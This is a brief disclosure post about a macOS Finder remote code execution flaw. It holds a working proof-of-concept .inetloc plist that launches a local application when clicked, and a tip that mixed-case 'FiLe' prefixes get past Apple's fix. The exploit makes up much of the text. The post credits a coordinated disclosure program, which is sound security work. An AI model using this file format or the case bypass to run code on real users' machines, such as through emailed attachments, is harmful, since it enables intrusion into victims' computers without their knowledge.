MacOS Finder RCE

[ynevo]

A vulnerability in macOS Finder allows files whose extension is inetloc to execute arbitrary commands, these files can be embedded inside emails which if the user clicks on them will execute the commands embedded inside them without providing a prompt or warning to the user.

POC:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
  <dict>
    <key>URL</key>
    <string>FiLe:////////////////////////System/Applications/Calculator.app</string>
  </dict>
</plist>

btw Apple has fixed "file" prefix but you can still use FiLe or FIle etc.
Credits: https://ssd-disclosure.com/ssd-advisory-macos-finder-rce/
An independent security researcher, Park Minchan, has reported this vulnerability to the SSD Secure Disclosure program.